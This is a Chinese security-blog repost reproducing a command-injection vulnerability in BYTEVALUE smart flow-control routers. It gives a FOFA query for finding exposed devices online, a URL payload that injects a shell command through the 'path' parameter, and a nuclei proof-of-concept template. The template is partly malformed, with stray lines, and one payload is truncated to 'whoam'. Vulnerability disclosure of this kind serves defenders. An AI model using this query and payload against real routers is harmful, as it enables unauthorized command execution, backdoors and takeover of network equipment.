大家可以把蚁剑安全实验室“设为星标”,这样就可以及时看到我们最新发布的“漏洞预警”及“漏洞复现”的安全内容啦!
免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
一、漏洞描述
百为智能流控路由器是一款专业让网速流畅的路由器,专业为网吧、小区量身定做,让网速流畅的路由器,使用智能流量控制、多线路扩展及智能分流、智能业务识别、智能QoS等技术来实现线路带宽的充分利用,不浪费线路带宽。
该路由器存在命令注入执行漏洞,攻击者可通过此漏洞进行执行命令,写入后门,获取服务器权限等危害。
二、漏洞复现
1、fofa语法查找:title="BYTEVALUE 智能流控路由器"
2、路由器登录页面如下:
3、使用burp工具进行抓包,接着构造命令执行请求包,查看响应的内容(或直接拼接payload)
payload:/goform/webRead/open/?path=|whoam
4、nuclei测试POC如下:
id: BYTEVALUE-Rce
info:
name: BYTEVALUE-Rce
author: BYTEVALUE-Rce
severity: critical
tags: BYTEVALUE
http:
raw:
|
GET /goform/webRead/open/?path=|whoami HTTP/1.1
Host: {{Hostname}}
application/x-www-form-urlencoded :
and :
matchers:
type: word
words:
"admin"
type: status
status:
200
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】百为智能流控路由器命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论